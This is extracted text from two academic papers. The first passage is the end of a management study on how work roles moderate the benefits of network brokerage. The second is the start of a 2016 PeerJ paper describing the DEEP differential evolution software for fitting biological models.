theory, we assumed the causality of brokerage predicting performance in our research design. Our approach speaks to this causality, but as the communication network structures may take time to develop and become rigid, we are still left with a concern of reverse causality in which performance leads to structural advantage to some extent. This may be the case with the employees in interdependent roles, since brokerage was, as expected, associated with a higher idea promoter score, and promoters have a tendency to become central individuals (Obstfeld, 2005; Scott, 2000), making our idea promoter DV actually a measure of prestige. Nevertheless, becoming prestigious in a professional organization arguably requires brokerage between others, so we are certain to have captured the right phenomenon with our measure of idea promotion. The third limitation is related to alternative explanations on the mechanisms of why the nature of work role moderates brokerage. Our argumentation developed around Thompson’s (1967) idea of more independent roles (e.g. professional architects in our case) requiring less collaboration and coordination, thus benefiting less from brokerage is in line with previous research. However, differences in legitimacy between professional architects and managers would provide an alternative explanation for our hypothesis in our data. For example, Burt (1998) shows that women do not benefit from brokerage unless they have a more senior mentor as a sponsor, and argues that this effect is common for all low-status individuals in an organization (Burt and Merluzzi, 2014). High-status versus low- status distinction is not entirely unrelated to the interdependent–independent distinction in our paper as the managers, on average, in our case firm have higher tenure and education levels than professional architects. However, nothing in our interviews and discussions in the company signaled to us about a possible legitimacy problem in the company. The fourth limitation is related to our performance measures. Billable hours as a measure of pro fessional’s performance is uniform across all indi viduals, but the idea promotion score merits further examination. Superior evaluations have been the most commonly used across previous network studies, despite variation across superiors (Teigland and Wasko, 2009). Our peer evaluation method’s strongpoint is that it rules out the variance between different supervisors evaluating their subordinates. We considered peer evaluation meaningful, because the size of the firm was rather small, and everyone knew each other since they shared the same open office space. Future research could extend the findings of this paper in numerous directions. One direction comes from the contribution of this paper suggesting the independent–interdependent work role as a boundary condition for brokerage. As brokerage theory has been applied to a wide range of work contexts, which might be argued to vary in terms of interdependence, the interdependence aspect has not been at the core of their research design implying that it should be equally well applicable to both. Moreover, most of the empirical evidence of benefits of brokerage up until now has been done exclusively with managers, therefore coming from the work that is fundamentally interdependent (e.g. chain managers or investment bankers). Further research would be needed to complement brokerage theory with work role point of view to clarify this specific boundary condition. Further research could also investigate more how status differences and legitimacy issues between individuals act as boundary conditions. For theorizing this stream of research, brokerage theory could benefit from hypotheses of status differences coming from evolutionary psychology and behavioral economics. Management theory’s formal–informal aspects present another future research direction. An innovative approach would be to study the co- existence and effectiveness of formal and informal structures with operationalizing formal structures not only as role hierarchies but also as workflow networks derived from project data and control for clearly work-related communication between superiors and employees. As most professional organizations are not as stratified as architectural firms, participating in the same project would serve as a proxy for formal structure. Novel data gathering methods about informal social structure could also be used. Since work-related communication is increasingly taking place digitally, communication data can be gathered from databases in addition to self-administered surveys. By analyzing the content of communication by text mining; for example, examining the content of e-mails individuals send each other, and dividing the content between formal and informal communication, would shed light on a multiplicity of relationships, 57 CONNECTIONS efficiency and innovativeness on a large scale, and answer the question as to how these network structures are associated with each other. Managerial implications In addition to the theoretical contributions, our study has implications for managers of professional organizations. According to the extant understanding in the managerial practice, successful organizations are both highly efficient in what they do and capable of adapting to changes. Typically, in professional organizations, professionals work primarily on tasks requiring specialized skills and competence, and managers work primarily in project management, sales, and offering development. Executives of professional organizations, at least in the most artistically and intellectually demanding kind, such as architecture, should therefore proceed with caution with the ideas of flattening formal hierarchies and divisions of labor in their organizations, in order to sustain simultaneous managerial capacity and professional performance. The finding that brokerage affords limited advantage to independent professionals suggests that, contrary to common belief, such people maybe should not invest a great deal of their time in networking and bridge building if that is not what their professional roles require. An informal organization in a professional organization can thus be seen as a mixture of independent professionals and interdependent managers. A successful firm balancing efficiency and adaptation is one that provides room for both independent and interdependent work roles and considers that not everyone should behave as brokers. Conclusion In this paper, we examined how work role moderates the advantages of brokerage for role-prescribed performance. Our findings suggest that the advantage is contingent upon the work role and brokerage facilitates role-prescribed performance for individuals in interdependent roles but not for those in independent roles. References Adler, P. and Kwon, S.-W. 2000. “Social capital: the good, the bad, and the ugly”, In Lesser, E. (Ed.), Know ledge and Social Capital. Foundations and Applications. Butterworth-Heineman, Boston, MA, pp. 89–119. Adler, P. S. and Kwon, S.-W. W. 2002. Social capital: prospects for a new concept. Academy of Management Review 27: 17–40. Ahuja, M. K., Galletta, D. F. and Carley, K. M. 2003. Individual centrality and performance in virtual R&D groups: an empirical study. Management Science 49: 21–38. Amabile, T. M. 1996. Creativity in Context, vol. xviii Boulder, CO, 317 pp. Antonakis, J. and Dietz, J. 2011. Looking for validity or testing it? The perils of stepwise regression, extreme- scores analysis, heteroscedasticity, and measurement error. Personality and Individual Differences 50: 409–415. Aral, S. and Van Alstyne, M. 2011. The diversity- bandwidth trade-off. American Journal of Sociology 117: 90–171. Bachrach, D. G., Powell, B. C., Collins, B. J. and Richey, R. G. 2006. Effects of task interdependence on the relationship between helping behavior and group per- formance. Journal of Applied Psychology 91: 1396–1405. Barnes, M., Kalberg, K., Pan, M. and Leung, P. 2016. When is brokerage negatively associated with economic benefits? Ethnic diversity, competition, and common-pool resources. Social Networks 45: 55–65. Biancani, S., McFarland, D. A. and Dahlander, L. 2014. The Semiformal Organization. Organization Science 25: 1306–1324. Biddle, B. 1986. Recent developments in role theory. Annual Review of Sociology 12: 67–92. Borgatti, S. P., Everett, M. G. and Johnson, J. C. 2018. Analyzing Social Networks, Sage, London. Brass, D. J. 1981. Structural relationships, job charac- teristics, and worker satisfaction and per formance. Administrative Science Quarterly 26: 331–348. Burt, R. S. 1992. Structural Holes: The Social Structure of Competition, vol. 58, Harvard University Press, Cambridge MA, available at: http://books. google.com/books?id=E6v0cVy8hVIC Burt, R. S. 1997. The contingent value of social capital. Administrative Science Quarterly 42: 339–365. Burt, R. S. 1998. The gender of social capital. Rationality and Society 10: 5–46. Burt, R. S. 2004. Structural holes and good ideas. American Journal of Sociology 110: 349–399. Burt, R. S. and Merluzzi, J. 2014. Embedded brokerage: hubs versus locals. Research in the Sociology of Organizations 40: 161–77. Carboni, I. and Ehrlich, K. 2013. The effect of relational and team characteristics on individual performance: a social network perspective. Human Resource Management 52: 511–535. Carnabuci, G. and Oszegi, D. I. 2015. Social networks, cognitive style, and innovative performance: a contingency perspective. Academy of Management Journal 58: 881–905. Cross, R. and Cummings, J. N. 2004. Tie and network correlates of individual performance in 58 The contingent effect of work roles on brokerage in professional organizations knowledge-intensive work. Academy of Management Journal 47: 928–937. Cummings, T. G. 1978. Self-regulating work groups: a socio-technical synthesis. Academy of Management Review 3: 625–634. Dawson, J. F. 2014. Moderation in management research: what, why, when, and how. Journal of Business and Psychology 29: 1–19. Emirbayer, M. and Goodwin, J. 1994. Network analysis , culture, and the problem of agency. American Journal of Sociology 99: 1411–1454. Etzioni, A. 1964. Modern Organizations Prentice- Hall, Englewood Cliffs, NJ. Fang, R., Landis, B., Zhang, Z., Anderson, M. H., Shaw, J. D. and Kilduff, M. 2015. Outcomes in organizations integrating personality and social networks: a meta-analysis of personality, network position, and work outcomes in organizations. Organization Science 26: 1243–1260. Fleming, L., Mingo, S. and Chen, D. 2007. Collaborative brokerage, generative creativity, and creative success. Administrative Science Quarterly 52: 443–475. Freeman, L. C. 1977. A set of measures of centrality based on betweenness. Sociometry 40: 35–40. Granovetter, M. S. 1973. The strength of weak ties. American Journal of Sociology 78: 1360–1380. Griffin, M. A., Neal, A. and Parker, S. K. 2007. A new model of work role performance: positive behavior in uncertain and interdependent contexts. Academy of Management Journal 50: 327–347. Hansen, M. T. 1999. The search-transfer problem: the role of weak ties in sharing knowledge across organization subunits. Administrative Science Quarterly 44: 82–111. Hansen, M. T. and Haas, M. R. 2001. Competing for attention in knowledge markets: electronic document dissemination in a management consulting company. Administrative Science Quarterly 46: 1–28. Ibarra, H. and Andrews, S. B. 1993. Power, social influence, and sense making: effects of network centrality and proximity on employee perceptions. Administrative Science Quarterly 38: 277–303. Katz, D. and Kahn, R. L. 1978. The Social Psychology of Organizations 2nd ed., Wiley, New York, NY. Kleinbaum, A. M., Stuart, T. E. and Tushman, M. L. 2013. Discretion within constraint: homophily and structure in a formal organization. Organization Science 24: 1316–1357. Krackhardt, D. 1990. Assessing the political landscape: structure, cognition, and power in organizations. Admini strative Science Quarterly 35: 342–369. Krackhardt, D. J. 1994. “Graph theoretical dimensions of informal organizations”, In Carley, K. M. and Prietula, M. J. (Eds), Computational Organization Theory, L. Erlbaum Associates, Hillsdale, NJ, pp. xvii, 318 pp. Landis, B. 2016. Personality and social networks in organizations: a review and future directions. Journal of Organizational Behavior 37: S107–S121. Langfred, C. W. 2000. Work-group design and autonomy: a field study of the interaction between task interdependence and group autonomy. Small Group Research 31: 54–70. Langfred, C. W. 2005. Autonomy and performance in teams: the multilevel moderating effect of task interdependence. Journal of Management 31: 513–529. Leroy, H., Anseel, F., Gardner, W. L. and Sels, L. 2015. Authentic leadership, authentic followership, basic need satisfaction, and work role performance: a cross- level study. Journal of Management 41: 1677–1697. Lincoln, J. R. 1990. Social structures: a network approach. Administrative Science Quarterly 35: 748–752. Lincoln, J. R. and Miller, J. 1979. Work and friendship ties in organizations: a comparative analysis of relational networks. Administrative Science Quarterly 24: 181–199. March, J. G. 1991. Exploration and exploitation in organizational learning. Organization Science 2: 71–87. Marsden, P. (2011), “Survey methods for network data”, In Scott, J. and Carrington, P. J. (Eds), The Sage Handbook of Social Network Analysis, Sage Publications, London, pp. 370–388. Mayhew, B. H. 1980. Structuralism Versus Indi- vidualism: part 1, Shadowboxing in the Dark. Social Forces 59: 335–375. McEvily, B., Soda, G. and Tortoriello, M. 2014. More formally: rediscovering the missing link between formal organization and informal social structure. The Academy of Management Annals 8: 299–345. Mehra, A., Kilduff, M. and Brass, D. J. 2001. The social networks of high and low self-monitors: implications for workplace performance. Administrative Science Quarterly 46: 121–146. Merton, R. 1939. Bureaucratic structure and personality. Social Forces 18: 560–568. Obstfeld, D. 2005. Social Networks, the tertius iungens orientation, and involvement in innovation. Administrative Science Quarterly 50: 100–130. Padgett, J. F. and Ansell, C. K. 1993. Robust action and the rise of the Medici, 1400-1434. American Journal of Sociology 98: 1259–1319. Pfeffer, J. and Salancik, G. R. 1975. Determinants of supervisory behavior: a role set analysis. Human Relations 28: 139–154. Reagans, R. and McEvily, B. 2003. Network structure and knowledge transfer: the effects of cohesion and range. Administrative Science Quarterly 48: 240–267. Reagans, R. and McEvily, B. 2008. Contradictory or compatible? Reconsidering the “Trade-Off” between brokerage and closure on knowledge sharing. Network Strategy 25: 275–313. Reagans, R. and Zuckerman, E. W. 2001. Networks, diversity, and productivity: the social capital of corporate R&D teams. Organization Science 12: 502–517. Saavedra, R., Earley, P. C. and Van Dyne, L. 1993. Complex interdependence in task-performing groups. Journal of Applied Psychology 78: 61–72. 59 CONNECTIONS Scott, J. 2000. Social Network Analysis: A Handbook 2nd ed, Sage Publications, London. Soda, G. and Zaheer, A. 2012. A network perspective on organizational architecture: performance effects of the interplay of formal and informal organization. Strategic Management Journal 33: 751–771. Soda, G., Stea, D. and Pedersen, T. 2019. Network structure, collaborative context, and individual creativity. Journal of Management 45: 1739–1765. Sparrowe, R. T., Liden, R. C., Wayne, S. J. and Kraimer, M. L. 2001. Social networks and the performance of individuals and groups. Academy of Management Journal 44: 316–325. Srivastava, S. B. 2015. Intraorganizational network dynamics in times of ambiguity. Organization Science 26: 1365–1380. Stajkovic, A. D., Lee, D. and Nyberg, A. J. 2009. Collective efficacy, group potency, and group perfor- mance: meta-analyses of their relationships, and test of a mediation model. Journal of Applied Psychology 94: 814–828. Teigland, R. and Wasko, M. 2009. Knowledge transfer in MNCs: examining how intrinsic motivations and knowledge sourcing impact individual centrality and performance. Journal of International Management 15: 15–31. Thompson, J. D. 1967. Organizations in Action McGraw-Hill, New York, NY. Tuominen, T. 2013. Innovation and development ac- tivities in professional service firms – a role structure per- spective, Aalto University publication series DOCTORAL DISSERTATIONS. Wang, J., Cheng, G. H., Chen, T. and Leung, K. 2019. Team creativity/innovation in culturally diverse teams: a meta-analysis. Journal of Organizational Behavior 40: 693–708. Wasserman, S. and Faust, K. 1994. Social Network Analysis: Methods and Applications. Cambridge University Press. New York, NY. Weber, M. 1982. “Bureaucracy”, in Grusky, O. and Miller, G. (Eds), Complex Organizations, Free Press, New York, NY, pp. 7–36. Welbourne, T. M., Johnson, D. E. and Erez, A. 1998. The role-based performance scale: validity analysis of a theory-based measure. Academy of Management Journal 41: 540–555. Table A1. Simple slopes of the Models 1, 3, 5, and 7. Delta method dy/dx SE z P > |z| [95% conf. interval] Promoting new ideas Inv. of Burt’s constraint independent work role 0 2.09692 60510 3.47 0.001 88567 3.30816 1 0.31451 0.19970 1.57 0.121 −0.08523 0.71427 Betweenness centrality independent work role 0 0.86236 0.14562 5.92 0.000 0.57087 1.15386 1 0.53269 0.22076 2.41 0.019 0.09077 0.97460 Billable hours Inv. of Burt’s constraint independent work role 0 −0.90929 0.35692 −2.55 0.014 −1.62375 −0.19484 1 0.30558 0.18013 1.70 0.095 −0.05499 0.66157 Betweenness centrality independent work role 0 −0.25708 0.15388 −1.67 0.100 −0.56511 0.05093 1 0.06624 0.24507 0.27 0.788 −0.42432 0.55680 Note: Statistically significant slopes italicized. Appendix work_33nbguho3jgb5kkpigcjwnzm64 ---- Submitted 3 November 2015 Accepted 21 June 2016 Published 8 August 2016 Corresponding author Konstantin Kozlov, kozlov_kn@spbstu.ru, mackoel@gmail.com Academic editor Sandra Gesing Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.74 Copyright 2016 Kozlov et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A software for parameter optimization with Differential Evolution Entirely Parallel method Konstantin Kozlov1, Alexander M. Samsonov1,2 and Maria Samsonova1 1 Mathematical Biology and Bioinformatics Lab, IAMM, Peter the Great St. Petersburg Polytechnic University, St. Petersburg, Russia 2 Ioffe Institute, Saint Petersburg, Russia ABSTRACT Summary. Differential Evolution Entirely Parallel (DEEP) package is a software for finding unknown real and integer parameters in dynamical models of biological processes by minimizing one or even several objective functions that measure the deviation of model solution from data. Numerical solutions provided by the most efficient global optimization methods are often problem-specific and cannot be easily adapted to other tasks. In contrast, DEEP allows a user to describe both mathematical model and objective function in any programming language, such as R, Octave or Python and others. Being implemented in C, DEEP demonstrates as good performance as the top three methods from CEC-2014 (Competition on evolutionary computation) benchmark and was successfully applied to several biological problems. Availability. DEEP method is an open source and free software distributed under the terms of GPL licence version 3. The sources are available at http://deepmethod. sourceforge.net/ and binary packages for Fedora GNU/Linux are provided for RPM package manager at https://build.opensuse.org/project/repositories/home:mackoel: compbio. Subjects Computational Biology, Distributed and Parallel Computing, Optimization Theory and Computation Keywords Differential Evolution, Parameter optimization, Mathematical modeling, Parallelization, Bioinformatics, Open source software INTRODUCTION The estimation of dynamical model parameters minimizing the discrepancy between model solution and the set of observed data is among the most important, widely studied problems in applied mathematics, and is known as an inverse problem of mathematical modeling (Mendes & Kell, 1998; Moles, Mendes & Banga, 2003). Numerical strategies for solutions of an inverse problems often involve optimization methods. Many global and local, stochastic and deterministic optimization techniques, including the nature-inspired ones, have been developed and implemented in a wide range of free, open source and commercial software packages. Mathematical modeling being one of the primary tools of computational systems biology provides new insights into the mechanisms that control the biological systems. It becomes very attractive to experimentalists due to predictive abilities of carefully selected models, if any. How to cite this article Kozlov et al. (2016), A software for parameter optimization with Differential Evolution Entirely Parallel method. PeerJ Comput. Sci. 2:e74; DOI 10.7717/peerj-cs.74 https://peerj.com mailto:kozlov_kn@spbstu.ru mailto:mackoel@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.74 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://deepmethod.sourceforge.net/ http://deepmethod.sourceforge.net/ https://build.opensuse.org/project/repositories/home:mackoel:compbio https://build.opensuse.org/project/repositories/home:mackoel:compbio http://dx.doi.org/10.7717/peerj-cs.74 Researchers benefit from the ability of a model to predict in silico the consequences of a biological experiment, which was not used for training. The properties of the model are determined by the structure of the mathematical description and the values of the unknown constants and control parameters that represents the coefficients of underlying biochemical reactions. These unknowns are to be found as a best suited solution to an inverse problem of mathematical modeling, i.e., by the fitting model output to experimental observations. The parameter set is to be reliable, and different types of data are to be considered. Development of reliable and easy-to-use algorithmsand programs for solution to the inverse problem remains a challenging task due to diversity and high computational complexity of biomedical applications, as well as the necessity to treat large sets of heterogeneous data. In systems biology the commonly used global optimization algorithm is the parallel Simulated Annealing (SA) (Chu, Deng & Reinitz, 1999). This method requires considerable CPU time, but is capable to eventually find the global extremum and runs efficiently in parallel computations. However, the wide range of methods called Genetic Algorithms (GA) has been developed later and successfully applied to biological problems (Spirov & Kazansky, 2002). Modern Evolutionary algorithms such as Evolution Strategies (ESs) or Differential Evolution (DE) can outperform other methods in the estimation of parameters of several biological models (Fomekong-Nanfack, Kaandorp & Blom, 2007; Fomekong- Nanfack, 2009; Suleimenov, 2013). The general challenge in the efficient implementation of the global optimization methods is that they depend on problem-specific assumptions and thus are not able to be easily adapted to another problems. For example, in SA both the final result and computational time depend on the so-called cooling schedule, the success of the GA optimization strongly depends on selected mutation, recombination and selection rules, and the evolutionary algorithms heavily rely on the algorithmic parameters which define the model of evolution. Currently a lot of approaches exist based on metaheuristics for parameters estimation in biology. For example, enhanced Scatter Search (Egea, Martí & Banga, 2010), implemented in MEIGOR (Metaheuristics for systems biology and bioinformatics global optimization) package for R statistical language was reported to outperform the state-of-the-art methods (Egea et al., 2014). This method can provide high quality solution for integer and real parameters, however, it is computationally expensive. We developed DEEP, a software that implements the Differential Evolution Entirely Parallel (DEEP) method introduced recently (Kozlov & Samsonov, 2011). The rationale behind the design of this programme was to provide an open source software with performance comparable to the competitive packages, as well as to allow a user to implement both mathematical model and comparison of solution with experimental data in any software package or programming language, such as R, Octave, Python or others. PROBLEM STATEMENT DEEP method was developed to solve the inverse problem of mathematical modeling. For a given mathematical model with parameters q∈RK , where K is number of parameters, and observable data Y we seek the vector q̂: q̂=argminF(q,Y ) (1) Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 where F is a measure of the deviation of model prediction from observable data. Additional constraints may be imposed: hj(q)=0, j=1,...,NH (2) gm(q)≤0, m=1,...,NG (3) qLk a, β= |a−b|−1 9−2 . Then the offspring is created according to the formula: vb,j+1=c1+(c2−c1)◦r, where r ={rk}, rk =U(0,1), k =1,...,K is a random number uniformly distributed between 0 and 1. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 6/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 Selection rule Algorithm 3. SELECTION proc select (individual) = { if (F < the value of the parent) then Accept offspring else for all criteria Fi, hj, gm as f do if (f < the value of the parent) then Generate the random number U . if (U < control parameter for this criterion) then Accept offspring end if end if end for end if } In order to increase the robustness of the procedure we have implemented the follow- ing selection rule for DE, described in detail in Kozlov et al. (2013) (see the Algorithm 3 insertion). Briefly, several different objective functions are used to decide if an offspring will be selected for a new generation. Firstly, the main objective function is checked. The offspring replaces its parent if the value of this function for offspring’s set of parameters is less than that for the parental one. In the opposite case the additional objective functions are considered. The offspring replaces its parent if the value of any other objective function is better, and a randomly selected value is less than the predefined parameter for this function. Preserving population diversity The original DE algorithm was highly dependent on internal parameters as reported by other authors, see, for example (Gaemperle, Mueller & Koumoutsakos, 2002). An efficient adaptive scheme for selection of internal parameters Sk and pk based on the control of the population diversity was proposed in Zaharie (2002). Let us consider the variation for parameter k in the current generation: vark = 1 NP NP∑ i=1 ( qik− 1 NP NP∑ l=1 qlk )2 where k=1,...,n. For the next generation the scaling constant is calculated by Sk =   √ NP ·(ρk−1)+pk(2−pk) 2·NP ·pk NP ·(ρk−1)+pk(2−pk)≥0 Sinf NP ·(ρk−1)+pk(2−pk)<0 Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 7/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 or alternatively the crossover probability is adopted as pk = { −(NP ·S2k−1)+ √ (NP ·S2k−1) 2−NP ·(1−ρk) ρk ≥1 pinf ρk <1 where Sinf =1/ √ NP, pinf =0, ρk =γ ( varpreviousk /vark ) and γ is a new constant that controls the decrease of the variability of parameters in the course of iteration process. Mixed integer-real problems DE operates on floating point parameters, while many real problems contain integer parameters, e.g., indices of some kind. Two algorithms for parameter conversion from real to integer are implemented in DEEP method as described in Kozlov et al. (2013). The first method rounds off a real value to the nearest integer number. The second procedure consists of the following steps: • The values are sorted in ascending order. • The index of the parameter in the floating point array becomes the value of the parameter in the integer array. Parallelization of objective function calculation Algorithm 4. OBJECTIVE FUNCTION proc objfunc (population) = { Create a Pool of a specified number worker threads. Create an Asynchronous Queue of tasks Q in the Pool. for all individuals in population as x do Push x to queue Q. end for Wait all worker threads in the Pool to finish. } proc Worker Thread (parameters) = { 1. Transform parameters from real to integer as needed. 2. Save parameters into temporary file of specified format. 3. Call specified program and supply the temporary file to it. 4. Capture output of the program. 5. Split output with specified delimiters into a list of values. 6. Assign values in the specified order to Fi, hj, gm,∀i,j,m. 7. Return Worker Thread to Pool. } Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 DEEP can be effectively parallelized due to independent evaluation of each population member. Various models for evolutionary algorithms parallelization have been developed, such as master-slave, island, cellular or hybrid versions (Tasoulis et al., 2004). The approach implemented in DEEP (see the Algorithm 4 insertion) utilizes the multicore architecture of modern CPUs and employs the pool of worker threads with asynchronous queue of tasks to evaluate the individual solutions in parallel. The calcu- lation of objective function for each trial vector using the command supplied by a user is pushed to the asynchronous queue and starts as soon as there is an available thread in the pool. Such approach is similar to ‘‘guided’’ schedule in OpenMP but gives us more flexibility and control. The command output is automatically recognized according to the specified format. All threads started in the current iteration are to be finished before the next one starts. IMPLEMENTATION DEEP is implemented in C programming language as console application and employs interfaces from GLIB project (https://developer.gnome.org/glib/), e.g., Thread Pool API. The architecture allows a user to utilize any programming language or computer system, such as R, Octave or Python to implement both mathematical model and comparison of solution with experimental data. Control parameters All the control parameters are specified in the single input file as a key-value pairs in INI- format supplied to the DEEP executable on the command line. The control parameters are arranged into three groups described below. Mathematical Model section specifies the parameter number, both the lower and upper parameter bounds, as well as the software itself necessary to run a model. A possibility is provided to indicate parameters that are to be kept unchanged. Objective Function section defines the aggregation methods for constraints and multiple objectives. The type of function, i.e., main or additional objective, equality or inequality constraint, is denoted by special keyword. Ranks and weights are to be given here. Method Settings section allows the user to tune the settings, namely, population size, stopping criterion, offspring generation strategy, the number of the oldest individuals to be substituted in the next generation 9, the maximal number of working threads and the seed for random number generator. Two options for offspring generation are provided, namely the selection of best individual or ‘‘trigonometric mutation.’’ The stopping criterion can limit the convergence rate, absolute or relative value of the objective function, number of generations or the wall clock time. The initial population is by default generated randomly within the limits given; however, it is also possible to define one initial guess and generate the individuals in the specified vicinity of it. Programming interfaces The DEEP method can be used as the static or dynamic shared object and embedded in another software package. Application programming interfaces (APIs) can be used to Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 9/20 https://peerj.com https://developer.gnome.org/glib/ http://dx.doi.org/10.7717/peerj-cs.74 connect with existing code implementing mathematical model and objective function. This approach is often preferred in academic and industrial applications where the high level modeling system language is not sufficient or the computation time should be reduced. RESULTS Method testing on benchmark functions To evaluate the performance of DEEP we used three simple multimodal test functions of dimension D=30 from the Competition on Real Parameter Single Objective Optimization 2014 (CEC-2014) test suite (Liang, Qu & Suganthan, 2014), namely: Shifted and Rotated Griewank’s Function. H(x)=h ( M ( 600(x−oH) 100 )) +700; h(x)= D∑ i=1 x2i 4000 − D∏ i=1 cos ( xi √ i ) +1 Shifted Rastrigin’s Function. R(x)=r ( 5.12(x−or) 100 ) +800; r(x)= D∑ i=1 (x2i −10cos(2πxi)+10) Shifted Schwefel’s Function. S(x)= s ( 1000(x−os) 100 ) +1000; s(x)=418.9829×D− D∑ i=1 g(zi(xi)), where zi=xi+4.209687462275036x102, and g(zi)=   zisin(|zi| 1/2) if |zi|<500, (500−mod(zi,500))∗ ∗sin (√ |500−mod(zi,500)| ) − − (zi−500)2 1000D if zi >500, (mod(|zi|,500)−500)∗ ∗sin (√ |mod(zi,500)−500| ) − − (zi+500)2 1000D if zi <−500, and the global optimum is shifted to oi =[oi1,oi2,...,oiD]T and rotated using the rotation matrix Mi. For each function 51 runs were performed with identical settings and with random initial population. The maximal allowed number of functional evaluations was set to 3×105. Other DEEP settings were NP =200, Gmax =1,499 and 9=40. The measured error was the difference between the known optimal value and the obtained solution. Following the methodology described in Tanabe & Fukunaga (2014) we used the Wilcoxon rank-sum test with significance level p < 0.05 to compare the evaluation Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 Table 1 The results of statistical comparison of DEEP with the top three methods from CEC-2014 on 3 functions. The symbols+,−,≈ indicate that DEEP performed significantly better (+), significantly worse (−), or not significantly different (≈) compared to another algorithm using the Wilcoxon rank- sum test (significantly, p<0.05). All results are based on 51 runs. DEEP vs CMLP L-SHADE UMOEAs − (worse) 0 0 0 ≈ (no sig.) 3 3 1 + (better) 0 0 2 results for 51 runs with the results of the top three methods from CEC-2014 (Liang, Qu & Suganthan, 2014) taken from CEC-2014 report: 1. Covariance Matrix Learning and Searching Preference (CMLP) (Chen et al., 2014), 2. Success-History Based Parameter Adaptation for Differential Evolution (L-SHADE) (Tanabe & Fukunaga, 2014), 3. United Multi-Operator Evolutionary Algorithms (UMOEAs) (Elsayed et al., 2014). The number of benchmark functions from three tested (+), (−), (≈) is presented in Table 1. DEEP demonstrated the same or better performance. The method test on reduced model of gene regulation To demonstrate how DEEP works in applications we developed a realistic benchmark problem based on real biological model of gap gene regulatory network (Kozlov et al., 2015b). A model provides a dynamical description of gap gene regulatory system, using detailed DNA-based information, as well as spatial TF concentration data at varying time points. The gap gene regulatory network controls segment determination in the early Drosophila embryo (Akam, 1987; Jaeger, 2011; Surkova et al., 2008). The state variables of this model are the concentrations of mRNAs and proteins encoded by four gap genes hb, Kr, gt, and kni. The model implements the thermodynamic approach in the form proposed in He et al. (2010) to calculate the expression of a target gene at the RNA level. This level is proportional to the gene activation level also called the promoter occupancy, and is determined by concentrations of eight transcription factors Hb, Kr, Gt, Kni, Bcd, Tll, Cad and Hkb: Eai (t)= ZaON,i(t) ZaON,i(t)+Z a OFF,i(t) (7) where ZaON,i(t) and Z a OFF,i(t) are statistical weights of the enhancer with the basal transcriptional complex bound and unbound, respectively. Two sets of the reaction–diffusion differential equations for mRNA uai (t) and protein concentrations vai (t) describe the dynamics of the system (Reinitz & Sharp, 1995; Jaeger et al., 2004; Kozlov et al., 2012): duai /dt =R a uE a i (t)+D a u(n)[(u a i−1−u a i )+(u a i+1−u a i )]−λ a uu a i , (8) dvai /dt =R a vu a i (t−τ a v )+D a v(n)[(v a i−1−v a i )+(v a i+1−v a i )]−λ a vv a i , (9) where n is the cleavage cycle number, Rav and R a u are the maximum synthesis rates, D a v, D a u (to smooth the resulting model output) are the diffusion coefficients, λav and λ a u are the Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 11/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 decay rates for protein and mRNA of gene a. The model spans the time period of cleavage cycles 13 and 14A (c13 and c14 resp.) and the interval of A-P axis from 35% to 92% (58 nuclei) of embryo length. The number of nuclei along the A-P axis is doubled when going from c13 to c14. The model is fitted to data on gap protein concentrations from the FlyEx database (Pisarev et al., 2008) and mRNA concentrations from SuperFly (Cicin-Sain et al., 2015). To fit the model we used the residual sum of squared differences between the model output and data and we used the weighted Pattern Generation Potential proposed in Samee & Sinha (2013) as the second objective function: RSS(x,y)= ∑ ∀g,n,t:∃y g n (t) (xgn (t)−y g n (t)) 2 wPGP(x,y)= 1+(penalty(x,y)−reward(x,y)) 2 where g, n and t are gene, nucleus and time point respectively and reward(x,y)= ∑ iyi∗min(yi,xi)∑ iyi∗yi penalty(x,y)= ∑ i(ymax−yi)∗max(xi−yi,0)∑ i(ymax−yi)∗ ∑ i(ymax−yi) were xi and yi are respectively predicted and experimentally observed expression in nucleus i, and ymax is the maximum level of experimentally observed expression. Conse- quently, the combined objective function is defined by: F(q,Y )=2∗10−7∗RSS(v(q),V )+1.5∗10−7∗RSS(u(q),U) +wPGP(v(q),V )+0.6∗wPGP(u(q),U) +10−8∗Penalty(q), (10) where Y ={V,U} contains data for u and v, and the function Penalty limits the growth of regulatory parameters, and the weights were obtained experimentally. We simplified the original computationally expensive model (Kozlov et al., 2015b) to use it as a benchmark in our calculations as follows. Firstly, we reduced the number of nuclei from 58 to 10 and considered only one target gene with DNA sequence from kni. Consequently, the number of parameters was reduced to 34, two of which are of integer type. Biologically feasible box constraints in the form (4) are imposed for 28 parameters. Next, we fitted this reduced model to the coarsened data and used the obtained solution and model parameters as the synthetic data for benchmark. Thus, the exact parameters of benchmark optimization problem are known. To compare DEEP and MEIGOR (Egea et al., 2014) we run both methods in the same conditions and record the final value of the objective function (11), final parameters and the number of functional evaluations. We considered those solutions for which the final functional value is less than 0.005 that corresponds to parameters close to exact known values. The Welch two sample t-test demonstrated that DEEP used less objective function evaluations than MEIGOR with p<0.005 (see Fig. 1). Real applications DEEP software was successfully applied to explain the dramatic decrease in gap gene expression in early Drosophila embryo caused by a null mutation in Kr gene. Figure 2A Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 Figure 1 Comparison of number of objective function evaluations for DEEP and MEIGOR on reduced model of gene regulation. DEEP used less objective function evaluations than MEIGOR with p < 0.005 according to Welch two sample t-test. presents the topology of regulatory network inferred by fitting the dynamical 